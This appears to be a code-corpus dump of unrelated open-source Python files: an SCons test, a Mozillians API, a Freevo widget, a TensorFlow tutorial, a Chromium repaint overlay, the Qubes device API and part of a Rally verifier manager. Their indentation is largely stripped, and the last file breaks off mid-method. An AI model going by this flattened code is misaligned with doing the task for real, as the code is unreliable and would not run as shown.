# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/implicit-cache/SetOption.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
"""
Verify that SetOption('implicit_cache', 1) actually enables implicit
caching by detecting the case where implicit caching causes inaccurate
builds: a same-named file dropped into a directory earlier in the
CPPPATH list will *not* be detected because we use what's in the cache.
"""
import TestSCons
test = TestSCons.TestSCons()
test.write('SConstruct', """
SetOption('implicit_cache', 1)
env=Environment(CPPPATH=['i1', 'i2'])
env.Object('foo.c')
""")
test.subdir('i1')
test.subdir('i2')
test.write('foo.c', """
#include <foo.h>
void foo(void)
{
FOO_H_DEFINED
++x; /* reference x */
}
""")
test.write('i2/foo.h', """
#define FOO_H_DEFINED int x = 1;
""")
test.run(arguments = '.')
test.write('i1/foo.h', """
this line will cause a syntax error if it's included by a rebuild
""");
test.up_to_date(arguments = '.')
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| mit | -2,257,779,366,836,436,500 | 28.039474 | 106 | 0.729497 | false |
safwanrahman/mozillians | mozillians/groups/api/v2.py | 1 | 3872 | from django.shortcuts import get_object_or_404
import django_filters
from funfactory.urlresolvers import reverse
from rest_framework import viewsets, serializers
from rest_framework.response import Response
from mozillians.common.helpers import absolutify
from mozillians.groups.models import Group, GroupMembership, Skill
from mozillians.users.models import UserProfile
class GroupMemberSerializer(serializers.HyperlinkedModelSerializer):
privacy = serializers.CharField(source='get_privacy_groups_display')
username = serializers.Field(source='user.username')
class Meta:
model = UserProfile
fields = ('privacy', 'username', '_url')
class GroupSerializer(serializers.HyperlinkedModelSerializer):
member_count = serializers.Field()
url = serializers.SerializerMethodField('get_url')
class Meta:
model = Group
fields = ('id', 'url', 'name', 'member_count', '_url')
def get_url(self, obj):
return absolutify(reverse('groups:show_group', kwargs={'url': obj.url}))
class GroupDetailedSerializer(GroupSerializer):
members = GroupMemberSerializer(many=True, source='_members')
class Meta:
model = Group
fields = ('id', 'name', 'description', 'curator',
'irc_channel', 'website', 'wiki',
'members_can_leave', 'accepting_new_members',
'new_member_criteria', 'functional_area', 'members', 'url')
class SkillSerializer(serializers.HyperlinkedModelSerializer):
member_count = serializers.Field()
url = serializers.SerializerMethodField('get_url')
class Meta:
model = Skill
fields = ('id', 'url', 'name', 'member_count', '_url')
def get_url(self, obj):
return absolutify(reverse('groups:show_skill', kwargs={'url': obj.url}))
class SkillDetailedSerializer(SkillSerializer):
members = GroupMemberSerializer(many=True, source='_members')
class Meta:
model = Skill
fields = ('id', 'name', 'members', 'url')
class GroupFilter(django_filters.FilterSet):
class Meta:
model = Group
fields = ('name', 'functional_area', 'curator',
'members_can_leave', 'accepting_new_members',)
class SkillFilter(django_filters.FilterSet):
class Meta:
model = Skill
fields = ('name',)
class GroupViewSet(viewsets.ReadOnlyModelViewSet):
"""
Returns a list of Mozillians groups respecting authorization
levels and privacy settings.
"""
queryset = Group.objects.all()
serializer_class = GroupSerializer
ordering = 'name'
ordering_fields = ('name', 'member_count')
filter_class = GroupFilter
def get_queryset(self):
queryset = Group.objects.filter(visible=True)
return queryset
def retrieve(self, request, pk):
group = get_object_or_404(self.get_queryset(), pk=pk)
# Exclude members in 'pending' state
group._members = group.members.filter(privacy_groups__gte=self.request.privacy_level,
groupmembership__status=GroupMembership.MEMBER)
serializer = GroupDetailedSerializer(group, context={'request': self.request})
return Response(serializer.data)
class SkillViewSet(viewsets.ReadOnlyModelViewSet):
"""
Returns a list of Mozillians skills respecting authorization
levels and privacy settings.
"""
queryset = Skill.objects.all()
serializer_class = SkillSerializer
ordering_fields = ('name',)
filter_class = SkillFilter
def retrieve(self, request, pk):
skill = get_object_or_404(self.queryset, pk=pk)
skill._members = skill.members.filter(privacy_groups__gte=self.request.privacy_level)
serializer = SkillDetailedSerializer(skill, context={'request': self.request})
return Response(serializer.data)
| bsd-3-clause | 8,867,633,374,129,686,000 | 31.537815 | 93 | 0.673037 | false |
freevo/freevo1 | src/skins/main/textentry_area.py | 1 | 3760 | # -*- coding: iso-8859-1 -*-
# -----------------------------------------------------------------------
# scrollabletext_area.py - A scrollable text area for the Freevo skin
# -----------------------------------------------------------------------
# $Id$
#
# Notes:
# Todo:
#
# -----------------------------------------------------------------------
# Freevo - A Home Theater PC framework
# Copyright (C) 2002 Krister Lagerstrom, et al.
# Please see the file freevo/Docs/CREDITS for a complete list of authors.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MER-
# CHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# -----------------------------------------------------------------------
import copy
import types
from area import Skin_Area
from skin_utils import *
from skin import eval_attr
import config
class Textentry_Area(Skin_Area):
"""
    this class defines the Text Entry area
"""
def __init__(self):
Skin_Area.__init__(self, 'textentry')
self.text_entry = None
def update_content_needed(self):
"""
check if the content needs an update
"""
return True
def update_content(self):
"""
        update the text entry area
"""
menuw = self.menuw
settings = self.settings
layout = self.layout
area = self.area_val
content = self.calc_geometry(layout.content, copy_object=True)
if not hasattr(menuw, "text_entry"):
return
text_entry = menuw.text_entry
if self.text_entry != text_entry:
self.text_entry = text_entry
self.offset = 0
text = ''
total_width = 0
font = content.font
width = content.width
caret_x = 0
offset = self.offset
caret_position = text_entry.caret_position
pygame_font = font.font.font
if offset > caret_position:
offset = caret_position - 1
if offset < 0:
offset = 0
else:
total_width = 0
new_offset = caret_position
for i in range(caret_position, -1, -1):
temp_text = text_entry.text[i:caret_position]
total_width = font.font.stringsize(temp_text)
if total_width > width:
break
offset = i
self.offset = offset
total_width = 0
for i in range(offset, len(text_entry.text)):
total_width = font.font.stringsize(text_entry.text[offset:i+1])
if total_width > width:
break
text = text_entry.text[offset:i+1]
caret_text = text[:caret_position - offset]
# We need a more exact position than is returned by the OSDFont class (which
# caches character sizes but doesn't take account of kerning)
caret_x,h = pygame_font.size(caret_text)
# Draw Caret
self.drawroundbox(content.x + caret_x, content.y, 2, content.height, (content.color, 0, 0x00000000, 0))
# Draw text
self.drawstring(text, font, content, x=content.x, align_v='center', ellipses='', dim=False)
| gpl-2.0 | 3,474,443,716,475,095,000 | 31.136752 | 111 | 0.561702 | false |
KarateJB/Python.Practice | src/TensorFlow/venv/Lab/Tutorials/Sample/LinearRegression_tb.py | 1 | 2301 | """Linear Regression
https://brohrer.mcknote.com/zh-Hant/how_machine_learning_works/how_linear_regression_works.html
"""
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
# Parameters
learning_rate = 0.2
training_epochs = 201
display_step = 20
# Create 100 training data
train_X = np.random.rand(100).astype(np.float32)
train_Y = train_X * 0.1 + 0.3
# Try to find values for W and b that compute train_Y = W * train_X + b
# TensorFlow will learn them; the best fit is W: [0.1], b: [0.3]
# tf Graph Input
X = tf.placeholder("float")
Y = tf.placeholder("float")
with tf.name_scope('Weights'):
W = tf.Variable(tf.random_uniform([1], -1.0, 1.0), name='Weight')
tf.summary.histogram(name = 'Weights', values = W)
with tf.name_scope('Biases'):
b = tf.Variable(tf.zeros([1]), name='Bias')
tf.summary.histogram(name = 'Biases', values = b)
with tf.name_scope('Formula'):
y = W * train_X + b
# Minimize the mean squared errors.
with tf.name_scope('Loss'):
loss = tf.reduce_sum(tf.pow(y-train_Y, 2))/train_X.shape[0]
# loss = tf.reduce_mean(tf.square(y - train_Y)) # Or use reduce_mean
tf.summary.scalar('Loss', loss)
with tf.name_scope('Train'):
optimizer = tf.train.GradientDescentOptimizer(learning_rate)
train = optimizer.minimize(loss)
# Initialize the variables (i.e. assign their default value)
init = tf.global_variables_initializer()
# Start training
with tf.Session() as sess:
# Output graph
merged = tf.summary.merge_all()
writer = tf.summary.FileWriter("log/LinearRegression/", graph = sess.graph)
# Run the initializer
sess.run(init)
# Fit all training data
for step in range(training_epochs):
sess.run(train)
if step % display_step == 0:
stepStr = str(int(step/display_step) + 1) + '.'
print(stepStr, sess.run(W), sess.run(b))
sess.run(loss, feed_dict={X: train_X, Y:train_Y})
summary = sess.run(merged, feed_dict={X: train_X, Y:train_Y})
writer.add_summary(summary, step)
plt.plot(train_X, train_Y, 'go', label='Original data')
plt.plot(train_X, sess.run(W) * train_X + sess.run(b), label='Fitted line')
plt.legend()
plt.show()
| mit | 6,974,094,202,091,287,000 | 30.094595 | 95 | 0.633203 | false |
geminy/aidear | oss/qt/qt-everywhere-opensource-src-5.9.0/qtwebengine/src/3rdparty/chromium/third_party/WebKit/Tools/Scripts/webkitpy/layout_tests/controllers/repaint_overlay.py | 6 | 5063 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
def result_contains_repaint_rects(text):
return isinstance(text, str) and re.search(r'"paintInvalidations": \[$', text, re.MULTILINE) is not None
def extract_layer_tree(input_str):
if not isinstance(input_str, str):
return '{}'
if input_str[0:2] == '{\n':
start = 0
else:
start = input_str.find('\n{\n')
if start == -1:
return '{}'
end = input_str.find('\n}\n', start)
if end == -1:
return '{}'
# FIXME: There may be multiple layer trees in the result.
return input_str[start:end + 3]
def generate_repaint_overlay_html(test_name, actual_text, expected_text):
if not result_contains_repaint_rects(actual_text) and not result_contains_repaint_rects(expected_text):
return ''
expected_layer_tree = extract_layer_tree(expected_text)
actual_layer_tree = extract_layer_tree(actual_text)
return """<!DOCTYPE HTML>
<html>
<head>
<title>%(title)s</title>
<style>
body {
margin: 0;
padding: 0;
}
iframe {
position: absolute;
top: 80px;
left: 0;
border: 0;
z-index: -1;
}
canvas {
position: absolute;
top: 80px;
left: 0;
z-index: 1;
}
#actual {
display: none;
}
</style>
</head>
<body>
<label><input id="show-test" type="checkbox" checked onchange="toggle_test(this.checked)">Show test</label>
<label><input id="use-solid-colors" type="checkbox" onchange="toggle_solid_color(this.checked)">Use solid colors</label>
<br>
<span id='type'>Expected Invalidations</span>
<div id=overlay>
<canvas id='expected' width='2000' height='2000'></canvas>
<canvas id='actual' width='2000' height='2000'></canvas>
</div>
<script>
var overlay_opacity = 0.25;
function toggle_test(show_test) {
iframe.style.display = show_test ? 'block' : 'none';
}
function toggle_solid_color(use_solid_color) {
overlay_opacity = use_solid_color ? 1 : 0.25;
draw_repaint_rects();
}
var expected = %(expected)s;
var actual = %(actual)s;
function rectsEqual(rect1, rect2) {
return rect1[0] == rect2[0] && rect1[1] == rect2[1] && rect1[2] == rect2[2] && rect1[3] == rect2[3];
}
function draw_rects(context, rects) {
for (var i = 0; i < rects.length; ++i) {
var rect = rects[i];
context.fillRect(rect[0], rect[1], rect[2], rect[3]);
}
}
function draw_layer_rects(context, result) {
context.save();
if (result.position)
context.translate(result.position[0], result.position[1]);
var t = result.transform;
if (t) {
var origin = result.transformOrigin || [result.bounds[0] / 2, result.bounds[1] / 2];
context.translate(origin[0], origin[1]);
context.transform(t[0][0], t[0][1], t[1][0], t[1][1], t[3][0], t[3][1]);
context.translate(-origin[0], -origin[1]);
}
if (result.paintInvalidations) {
var rects = [];
for (var i = 0; i < result.paintInvalidations.length; ++i) {
if (result.paintInvalidations[i].rect)
rects.push(result.paintInvalidations[i].rect);
}
draw_rects(context, rects);
}
context.restore();
}
function draw_result_rects(context, result) {
if (result.layers) {
for (var i = 0; i < result.layers.length; ++i)
draw_layer_rects(context, result.layers[i]);
}
}
var expected_canvas = document.getElementById('expected');
var actual_canvas = document.getElementById('actual');
function draw_repaint_rects() {
var expected_ctx = expected_canvas.getContext("2d");
expected_ctx.clearRect(0, 0, 2000, 2000);
expected_ctx.fillStyle = 'rgba(255, 0, 0, ' + overlay_opacity + ')';
draw_result_rects(expected_ctx, expected);
var actual_ctx = actual_canvas.getContext("2d");
actual_ctx.clearRect(0, 0, 2000, 2000);
actual_ctx.fillStyle = 'rgba(0, 255, 0, ' + overlay_opacity + ')';
draw_result_rects(actual_ctx, actual);
}
draw_repaint_rects();
var path = decodeURIComponent(location.search).substr(1);
var iframe = document.createElement('iframe');
iframe.id = 'test-frame';
iframe.width = 800;
iframe.height = 600;
iframe.src = path;
var overlay = document.getElementById('overlay');
overlay.appendChild(iframe);
var type = document.getElementById('type');
var expected_showing = true;
function flip() {
if (expected_showing) {
type.textContent = 'Actual Invalidations';
expected_canvas.style.display = 'none';
actual_canvas.style.display = 'block';
} else {
type.textContent = 'Expected Invalidations';
actual_canvas.style.display = 'none';
expected_canvas.style.display = 'block';
}
expected_showing = !expected_showing
}
setInterval(flip, 3000);
</script>
</body>
</html>
""" % {
'title': test_name,
'expected': expected_layer_tree,
'actual': actual_layer_tree,
}
| gpl-3.0 | 9,069,632,416,049,365,000 | 27.44382 | 120 | 0.623543 | false |
kalkin/qubes-core-admin | qubes/devices.py | 1 | 17113 | #
# The Qubes OS Project, https://www.qubes-os.org/
#
# Copyright (C) 2010-2016 Joanna Rutkowska <[email protected]>
# Copyright (C) 2015-2016 Wojtek Porczyk <[email protected]>
# Copyright (C) 2016 Bahtiar `kalkin-` Gadimov <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
'''API for various types of devices.
The main concept is that some domains may
expose (potentially multiple) devices, which can be attached to other domains.
Devices can be of different buses (like 'pci', 'usb', etc.). Each device
bus is implemented by an extension.
Devices are identified by a pair of (backend domain, `ident`), where `ident` is
:py:class:`str` and can contain only characters from the `[a-zA-Z0-9._-]` set.
Such an extension should provide:
- `qubes.devices` endpoint - a class descendant from
:py:class:`qubes.devices.DeviceInfo`, designed to hold device description (
including bus-specific properties)
- handle `device-attach:bus` and `device-detach:bus` events for
performing the attach/detach action; events are fired even when domain isn't
running and extension should be prepared for this; handlers for those events
can be coroutines
- handle `device-list:bus` event - list devices exposed by particular
domain; it should return list of appropriate DeviceInfo objects
- handle `device-get:bus` event - get one device object exposed by this
domain of given identifier
- handle `device-list-attached:class` event - list currently attached
devices to this domain
- fire `device-list-change:class` event when device list change is detected
(new/removed device)
Note that device-listing event handlers cannot be asynchronous. This means,
for example, that you cannot call a qrexec service there. This is intentional,
to keep the device-listing operation cheap. You need to design the extension
to take this into account (for example by using QubesDB).
Extension may use QubesDB watch API (QubesVM.watch_qdb_path(path), then handle
`domain-qdb-change:path`) to detect changes and fire
`device-list-change:class` event.
'''
import asyncio
import qubes.utils
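# Illustrative sketch (hedged): roughly how a device-bus extension described in
# the module docstring above could look. The bus name 'testbus' and all class
# and handler names below are hypothetical, and the ``qubes.ext`` decorator
# usage is an assumption about the extension API rather than something defined
# in this file. ``DeviceInfo`` refers to the class defined further below.
#
#     import qubes.ext
#
#     class TestbusDevice(DeviceInfo):
#         '''Description of a single hypothetical 'testbus' device.'''
#
#     class TestbusExtension(qubes.ext.Extension):
#         @qubes.ext.handler('device-list:testbus')
#         def on_device_list(self, vm, event):
#             # should return a list of DeviceInfo objects exposed by `vm`
#             return [TestbusDevice(vm, ident='dev0', description='example')]
#
#         @qubes.ext.handler('device-get:testbus')
#         def on_device_get(self, vm, event, ident):
#             # should return a (possibly empty) list for the given identifier
#             return [TestbusDevice(vm, ident=ident)] if ident == 'dev0' else []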
class DeviceNotAttached(qubes.exc.QubesException, KeyError):
'''Trying to detach not attached device'''
pass
class DeviceAlreadyAttached(qubes.exc.QubesException, KeyError):
'''Trying to attach already attached device'''
pass
class DeviceInfo(object):
''' Holds all information about a device '''
# pylint: disable=too-few-public-methods
def __init__(self, backend_domain, ident, description=None,
frontend_domain=None):
#: domain providing this device
self.backend_domain = backend_domain
#: device identifier (unique for given domain and device type)
self.ident = ident
# allow redefining those as dynamic properties in subclasses
try:
#: human readable description/name of the device
self.description = description
except AttributeError:
pass
try:
#: (running) domain to which device is currently attached
self.frontend_domain = frontend_domain
except AttributeError:
pass
if hasattr(self, 'regex'):
# pylint: disable=no-member
dev_match = self.regex.match(ident)
if not dev_match:
raise ValueError('Invalid device identifier: {!r}'.format(
ident))
for group in self.regex.groupindex:
setattr(self, group, dev_match.group(group))
def __hash__(self):
return hash((self.backend_domain, self.ident))
def __eq__(self, other):
return (
self.backend_domain == other.backend_domain and
self.ident == other.ident
)
def __lt__(self, other):
if isinstance(other, DeviceInfo):
return (self.backend_domain, self.ident) < \
(other.backend_domain, other.ident)
return NotImplemented
def __str__(self):
return '{!s}:{!s}'.format(self.backend_domain, self.ident)
class DeviceAssignment(object): # pylint: disable=too-few-public-methods
''' Maps a device to a frontend_domain. '''
def __init__(self, backend_domain, ident, options=None, persistent=False,
bus=None):
self.backend_domain = backend_domain
self.ident = ident
self.options = options or {}
self.persistent = persistent
self.bus = bus
def __repr__(self):
return "[%s]:%s" % (self.backend_domain, self.ident)
def __hash__(self):
# it's important to use the same hash as DeviceInfo
return hash((self.backend_domain, self.ident))
def __eq__(self, other):
if not isinstance(self, other.__class__):
return NotImplemented
return self.backend_domain == other.backend_domain \
and self.ident == other.ident
def clone(self):
'''Clone object instance'''
return self.__class__(
self.backend_domain,
self.ident,
self.options,
self.persistent,
self.bus,
)
@property
def device(self):
'''Get DeviceInfo object corresponding to this DeviceAssignment'''
return self.backend_domain.devices[self.bus][self.ident]
class DeviceCollection(object):
'''Bag for devices.
Used as default value for :py:meth:`DeviceManager.__missing__` factory.
:param vm: VM for which we manage devices
:param bus: device bus
This class emits following events on VM object:
.. event:: device-attach:<class> (device)
Fired when device is attached to a VM.
Handler for this event can be asynchronous (a coroutine).
:param device: :py:class:`DeviceInfo` object to be attached
.. event:: device-pre-attach:<class> (device)
Fired before device is attached to a VM
Handler for this event can be asynchronous (a coroutine).
:param device: :py:class:`DeviceInfo` object to be attached
.. event:: device-detach:<class> (device)
Fired when device is detached from a VM.
Handler for this event can be asynchronous (a coroutine).
:param device: :py:class:`DeviceInfo` object to be attached
.. event:: device-pre-detach:<class> (device)
Fired before device is detached from a VM
Handler for this event can be asynchronous (a coroutine).
:param device: :py:class:`DeviceInfo` object to be attached
.. event:: device-list:<class>
Fired to get list of devices exposed by a VM. Handlers of this
event should return a list of py:class:`DeviceInfo` objects (or
appropriate class specific descendant)
.. event:: device-get:<class> (ident)
Fired to get a single device, given by the `ident` parameter.
Handlers of this event should either return appropriate object of
:py:class:`DeviceInfo`, or :py:obj:`None`. Especially should not
raise :py:class:`exceptions.KeyError`.
.. event:: device-list-attached:<class> (persistent)
Fired to get list of currently attached devices to a VM. Handlers
of this event should return list of devices actually attached to
a domain, regardless of its settings.
'''
def __init__(self, vm, bus):
self._vm = vm
self._bus = bus
self._set = PersistentCollection()
self.devclass = qubes.utils.get_entry_point_one(
'qubes.devices', self._bus)
@asyncio.coroutine
def attach(self, device_assignment: DeviceAssignment):
'''Attach (add) device to domain.
:param DeviceInfo device: device object
'''
if device_assignment.bus is None:
device_assignment.bus = self._bus
else:
assert device_assignment.bus == self._bus, \
"Trying to attach DeviceAssignment of a different device class"
if not device_assignment.persistent and self._vm.is_halted():
raise qubes.exc.QubesVMNotRunningError(self._vm,
"Devices can only be attached non-persistent to a running vm")
device = device_assignment.device
if device in self.assignments():
raise DeviceAlreadyAttached(
'device {!s} of class {} already attached to {!s}'.format(
device, self._bus, self._vm))
yield from self._vm.fire_event_async('device-pre-attach:' + self._bus,
pre_event=True,
device=device, options=device_assignment.options)
if device_assignment.persistent:
self._set.add(device_assignment)
yield from self._vm.fire_event_async('device-attach:' + self._bus,
device=device, options=device_assignment.options)
def load_persistent(self, device_assignment: DeviceAssignment):
'''Load DeviceAssignment retrieved from qubes.xml
This can be used only for loading qubes.xml, when VM events are not
enabled yet.
'''
assert not self._vm.events_enabled
assert device_assignment.persistent
device_assignment.bus = self._bus
self._set.add(device_assignment)
def update_persistent(self, device: DeviceInfo, persistent: bool):
'''Update `persistent` flag of already attached device.
'''
if self._vm.is_halted():
raise qubes.exc.QubesVMNotStartedError(self._vm,
'VM must be running to modify device persistence flag')
assignments = [a for a in self.assignments() if a.device == device]
if not assignments:
raise qubes.exc.QubesValueError('Device not assigned')
assert len(assignments) == 1
assignment = assignments[0]
# be careful to use already present assignment, not the provided one
# - to not change options as a side effect
if persistent and device not in self._set:
assignment.persistent = True
self._set.add(assignment)
elif not persistent and device in self._set:
self._set.discard(assignment)
@asyncio.coroutine
def detach(self, device_assignment: DeviceAssignment):
'''Detach (remove) device from domain.
:param DeviceInfo device: device object
'''
if device_assignment.bus is None:
device_assignment.bus = self._bus
else:
assert device_assignment.bus == self._bus, \
"Trying to attach DeviceAssignment of a different device class"
if device_assignment in self._set and not self._vm.is_halted():
raise qubes.exc.QubesVMNotHaltedError(self._vm,
"Can not remove a persistent attachment from a non halted vm")
if device_assignment not in self.assignments():
raise DeviceNotAttached(
'device {!s} of class {} not attached to {!s}'.format(
device_assignment.ident, self._bus, self._vm))
device = device_assignment.device
yield from self._vm.fire_event_async('device-pre-detach:' + self._bus,
pre_event=True, device=device)
if device in self._set:
device_assignment.persistent = True
self._set.discard(device_assignment)
yield from self._vm.fire_event_async('device-detach:' + self._bus,
device=device)
def attached(self):
'''List devices which are (or may be) attached to this vm '''
attached = self._vm.fire_event('device-list-attached:' + self._bus,
persistent=None)
if attached:
return [dev for dev, _ in attached]
return []
def persistent(self):
''' Devices persistently attached and safe to access before libvirt
bootstrap.
'''
return [a.device for a in self._set]
def assignments(self, persistent=None):
'''List assignments for devices which are (or may be) attached to the
vm.
Devices may be attached persistently (so they are included in
:file:`qubes.xml`) or not. Device can also be in :file:`qubes.xml`,
but be temporarily detached.
:param bool persistent: only include devices which are or are not
attached persistently.
'''
try:
devices = self._vm.fire_event('device-list-attached:' + self._bus,
persistent=persistent)
except Exception: # pylint: disable=broad-except
self._vm.log.exception('Failed to list {} devices'.format(
self._bus))
if persistent is True:
# don't break app.save()
return self._set
else:
raise
result = set()
for dev, options in devices:
if dev in self._set and not persistent:
continue
elif dev in self._set:
result.add(self._set.get(dev))
elif dev not in self._set and persistent:
continue
else:
result.add(
DeviceAssignment(
backend_domain=dev.backend_domain,
ident=dev.ident, options=options,
bus=self._bus))
if persistent is not False:
result.update(self._set)
return result
def available(self):
'''List devices exposed by this vm'''
devices = self._vm.fire_event('device-list:' + self._bus)
return devices
def __iter__(self):
return iter(self.available())
def __getitem__(self, ident):
'''Get device object with given ident.
:returns: py:class:`DeviceInfo`
        If the domain isn't running, it is impossible to check device validity,
        so return an UnknownDevice object. Do the same for non-existing
        devices - otherwise it would be impossible to detach an already
        disconnected device.
:raises AssertionError: when multiple devices with the same ident are
found
'''
dev = self._vm.fire_event('device-get:' + self._bus, ident=ident)
if dev:
assert len(dev) == 1
return dev[0]
return UnknownDevice(self._vm, ident)
class DeviceManager(dict):
    '''Device manager that holds all devices by their classes.
:param vm: VM for which we manage devices
'''
def __init__(self, vm):
super(DeviceManager, self).__init__()
self._vm = vm
def __missing__(self, key):
self[key] = DeviceCollection(self._vm, key)
return self[key]
class UnknownDevice(DeviceInfo):
# pylint: disable=too-few-public-methods
'''Unknown device - for example exposed by domain not running currently'''
def __init__(self, backend_domain, ident, description=None,
frontend_domain=None):
if description is None:
description = "Unknown device"
super(UnknownDevice, self).__init__(backend_domain, ident, description,
frontend_domain)
class PersistentCollection(object):
''' Helper object managing persistent `DeviceAssignment`s.
'''
def __init__(self):
self._dict = {}
def add(self, assignment: DeviceAssignment):
''' Add assignment to collection '''
assert assignment.persistent
vm = assignment.backend_domain
ident = assignment.ident
key = (vm, ident)
assert key not in self._dict
self._dict[key] = assignment
def discard(self, assignment):
''' Discard assignment from collection '''
assert assignment.persistent
vm = assignment.backend_domain
ident = assignment.ident
key = (vm, ident)
if key not in self._dict:
raise KeyError
del self._dict[key]
def __contains__(self, device) -> bool:
return (device.backend_domain, device.ident) in self._dict
def get(self, device: DeviceInfo) -> DeviceAssignment:
''' Returns the corresponding `qubes.devices.DeviceAssignment` for the
device. '''
return self._dict[(device.backend_domain, device.ident)]
def __iter__(self):
return self._dict.values().__iter__()
def __len__(self) -> int:
return len(self._dict.keys())
| gpl-2.0 | -1,120,786,019,905,310,100 | 34.87631 | 79 | 0.626191 | false |
openstack/rally | rally/verification/manager.py | 1 | 16784 | # All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import inspect
import io
import os
import re
import shutil
import sys
import pkg_resources
from rally.common.io import subunit_v2
from rally.common import logging
from rally.common.plugin import plugin
from rally import exceptions
from rally.verification import context
from rally.verification import utils
LOG = logging.getLogger(__name__)
URL_RE = re.compile(
r"^(?:(?:http|ftp)s?|ssh)://" # http:// or https://
r"(?:(?:[A-Z0-9](?:[A-Z0-9@-]{0,61}[A-Z0-9])?\.)+" # domain
r"(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|" # domain
r"localhost|" # localhost
r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" # IP
r"(?::\d+)?" # optional port
r"(?:/?|[/?]\S+)$", re.IGNORECASE)
class VerifierSetupFailure(exceptions.RallyException):
error_code = 224
msg_fmt = "Failed to set up verifier '%(verifier)s': %(message)s"
def configure(name, platform="default", default_repo=None,
default_version=None, context=None):
"""Decorator to configure plugin's attributes.
:param name: Plugin name that is used for searching purpose
:param platform: Plugin platform
:param default_repo: Default repository to clone
:param default_version: Default version to checkout
:param context: List of contexts that should be executed for verification
"""
def decorator(plugin_inst):
plugin_inst = plugin.configure(name, platform=platform)(plugin_inst)
plugin_inst._meta_set("default_repo", default_repo)
plugin_inst._meta_set("default_version", default_version)
plugin_inst._meta_set("context", context or {})
return plugin_inst
return decorator
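# Illustrative sketch (hedged): how the @configure decorator above is meant to
# be applied to a VerifierManager subclass (defined below). The plugin name,
# repository URL and class are invented for the example.
#
#     @configure(name='fake-verifier', platform='default',
#                default_repo='https://example.com/fake/verifier.git',
#                default_version='master')
#     class FakeVerifierManager(VerifierManager):
#         def list_tests(self, pattern=""):
#             return []
#
#         def run(self, context):
#             raise NotImplementedError()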
@plugin.base()
class VerifierManager(plugin.Plugin, metaclass=abc.ABCMeta):
"""Verifier base class.
This class provides an interface for operating specific tool.
"""
# These dicts will be used for building docs. PS: we should find a better
# place for them
RUN_ARGS = {"pattern": "a regular expression of tests to launch.",
"concurrency": "Number of processes to be used for launching "
"tests. In case of 0 value, number of processes"
" will be equal to number of CPU cores.",
"load_list": "a list of tests to launch.",
"skip_list": "a list of tests to skip (actually, it is a dict "
"where keys are names of tests, values are "
"reasons).",
"xfail_list": "a list of tests that are expected to fail "
"(actually, it is a dict where keys are names "
"of tests, values are reasons)."}
@classmethod
def _get_doc(cls):
run_args = {}
for parent in inspect.getmro(cls):
if hasattr(parent, "RUN_ARGS"):
for k, v in parent.RUN_ARGS.items():
run_args.setdefault(k, v)
doc = cls.__doc__ or ""
doc += "\n**Running arguments**:\n\n%s" % "\n".join(
sorted(["* *%s*: %s" % (k, v) for k, v in run_args.items()]))
doc += "\n\n**Installation arguments**:\n\n"
doc += ("* *system_wide*: Whether or not to use the system-wide "
"environment for verifier instead of a virtual environment. "
"Defaults to False.\n"
"* *source*: Path or URL to the repo to clone verifier from."
" Defaults to %(default_source)s\n"
"* *version*: Branch, tag or commit ID to checkout before "
"verifier installation. Defaults to '%(default_version)s'.\n"
% {"default_source": cls._meta_get("default_repo"),
"default_version": cls._meta_get(
"default_version") or "master"})
return doc
def __init__(self, verifier):
"""Init a verifier manager.
:param verifier: `rally.common.objects.verifier.Verifier` instance
"""
self.verifier = verifier
@property
def base_dir(self):
return os.path.expanduser(
"~/.rally/verification/verifier-%s" % self.verifier.uuid)
@property
def home_dir(self):
return os.path.join(self.base_dir, "for-deployment-%s"
% self.verifier.deployment["uuid"])
@property
def repo_dir(self):
return os.path.join(self.base_dir, "repo")
@property
def venv_dir(self):
return os.path.join(self.base_dir, ".venv")
@property
def environ(self):
env = os.environ.copy()
if not self.verifier.system_wide:
# activate virtual environment
env["VIRTUAL_ENV"] = self.venv_dir
env["PATH"] = "%s:%s" % (
os.path.join(self.venv_dir, "bin"), env["PATH"])
return env
def validate_args(self, args):
"""Validate given arguments to be used for running verification.
:param args: A dict of arguments with values
"""
# NOTE(andreykurilin): By default we do not use jsonschema here.
# So it cannot be extended by inheritors => requires duplication.
if "pattern" in args:
if not isinstance(args["pattern"], str):
raise exceptions.ValidationError(
"'pattern' argument should be a string.")
if "concurrency" in args:
